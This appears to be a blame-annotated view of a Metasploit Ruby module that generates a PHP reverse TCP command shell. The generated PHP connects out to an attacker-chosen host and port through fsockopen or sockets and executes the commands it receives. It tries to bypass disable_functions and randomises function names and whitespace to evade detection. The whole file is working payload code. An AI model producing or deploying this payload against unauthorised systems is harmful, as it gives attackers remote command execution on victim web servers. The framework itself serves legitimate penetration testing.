2007-02-18 00:10:39 +00:00
|
|
|
##
|
2008-03-04 07:34:26 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
2009-04-13 14:33:26 +00:00
|
|
|
# http://metasploit.com/framework/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
2006-12-18 22:06:19 +00:00
|
|
|
require 'msf/core'
|
2008-07-01 01:44:56 +00:00
|
|
|
require 'msf/core/payload/php'
|
2006-12-18 22:06:19 +00:00
|
|
|
require 'msf/core/handler/reverse_tcp'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
|
|
|
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
module Metasploit3
|
2006-12-18 22:06:19 +00:00
|
|
|
|
|
|
|
include Msf::Payload::Single
|
2008-07-01 01:44:56 +00:00
|
|
|
include Msf::Payload::Php
|
2006-12-18 22:06:19 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'PHP Command Shell, Reverse TCP (via php)',
|
2007-02-18 00:10:39 +00:00
|
|
|
'Version' => '$Revision$',
|
2008-03-04 07:34:26 +00:00
|
|
|
'Description' => 'Reverse PHP connect back shell with checks for disabled functions',
|
|
|
|
'Author' => 'egypt <egypt@nmt.edu>',
|
2006-12-18 22:06:19 +00:00
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Handler' => Msf::Handler::ReverseTcp,
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Offsets' => { },
|
|
|
|
'Payload' => ''
|
|
|
|
}
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
2008-03-04 07:34:26 +00:00
|
|
|
#
|
|
|
|
# Issues
|
|
|
|
# - Since each command is executed in a new shell, 'cd' does nothing.
|
|
|
|
# Perhaps it should be special-cased to call chdir()
|
|
|
|
# - Tries to get around disable_functions but makes no attempts to
|
|
|
|
# circumvent safe mode.
|
2006-12-18 22:06:19 +00:00
|
|
|
#
|
|
|
|
def php_reverse_shell
|
2007-02-04 01:53:43 +00:00
|
|
|
|
2008-03-04 20:50:39 +00:00
|
|
|
if (!datastore['LHOST'] or datastore['LHOST'].empty?)
|
2008-03-04 21:40:04 +00:00
|
|
|
# datastore is empty on msfconsole startup
|
|
|
|
ipaddr = 0x7f000001
|
|
|
|
port = 4444
|
|
|
|
else
|
|
|
|
ipaddr = datastore['LHOST'].split(/\./).map{|c| c.to_i}.pack("C*").unpack("N").first
|
|
|
|
port = datastore['LPORT']
|
2008-03-04 20:50:39 +00:00
|
|
|
end
|
2008-10-13 05:31:36 +00:00
|
|
|
exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)
|
2008-03-04 07:34:26 +00:00
|
|
|
|
|
|
|
shell=<<-END_OF_PHP_CODE
|
|
|
|
$ipaddr=long2ip(#{ipaddr});
|
|
|
|
$port=#{port};
|
2008-07-01 01:44:56 +00:00
|
|
|
#{php_preamble({:disabled_varname => "$dis"})}
|
|
|
|
|
2008-10-13 05:31:36 +00:00
|
|
|
if(!function_exists('#{exec_funcname}')){
|
|
|
|
function #{exec_funcname}($c){
|
2008-09-04 03:52:02 +00:00
|
|
|
global$dis;
|
|
|
|
#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
|
|
|
|
return$o;
|
|
|
|
}
|
|
|
|
}
|
2008-07-01 01:44:56 +00:00
|
|
|
$nofuncs='no exec functions';
|
|
|
|
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
|
2008-09-04 03:52:02 +00:00
|
|
|
$s=@fsockopen($ipaddr,$port);
|
2008-07-01 01:44:56 +00:00
|
|
|
while($c=fread($s,2048)){
|
2008-10-13 05:31:36 +00:00
|
|
|
$out=#{exec_funcname}(substr($c,0,-1));
|
2008-07-01 01:44:56 +00:00
|
|
|
if($out===false){
|
|
|
|
fwrite($s,$nofuncs);
|
2008-03-04 07:34:26 +00:00
|
|
|
break;
|
|
|
|
}
|
2008-07-01 01:44:56 +00:00
|
|
|
fwrite($s,$out);
|
2008-03-04 07:34:26 +00:00
|
|
|
}
|
2008-07-01 01:44:56 +00:00
|
|
|
fclose($s);
|
2008-03-04 07:34:26 +00:00
|
|
|
}else{
|
2008-09-04 03:52:02 +00:00
|
|
|
$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
|
|
|
|
@socket_connect($s,$ipaddr,$port);
|
|
|
|
@socket_write($s,"socket_create");
|
|
|
|
while($c=@socket_read($s,2048)){
|
2008-10-13 05:31:36 +00:00
|
|
|
$out=#{exec_funcname}(substr($c,0,-1));
|
2008-07-01 01:44:56 +00:00
|
|
|
if($out===false){
|
2008-09-04 03:52:02 +00:00
|
|
|
@socket_write($s,$nofuncs);
|
2008-03-04 07:34:26 +00:00
|
|
|
break;
|
|
|
|
}
|
2008-09-04 03:52:02 +00:00
|
|
|
@socket_write($s,$out,strlen($out));
|
2008-03-04 07:34:26 +00:00
|
|
|
}
|
2008-09-04 03:52:02 +00:00
|
|
|
@socket_close($s);
|
2008-03-04 07:34:26 +00:00
|
|
|
}
|
|
|
|
END_OF_PHP_CODE
|
2006-12-18 22:06:19 +00:00
|
|
|
|
2008-03-04 20:50:39 +00:00
|
|
|
# randomize the spaces a bit
|
2008-07-01 01:44:56 +00:00
|
|
|
Rex::Text.randomize_space(shell)
|
2006-12-18 22:06:19 +00:00
|
|
|
|
|
|
|
return shell
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Constructs the payload
|
|
|
|
#
|
|
|
|
def generate
|
|
|
|
return super + php_reverse_shell
|
|
|
|
end
|
|
|
|
|
2008-10-19 21:03:39 +00:00
|
|
|
end
|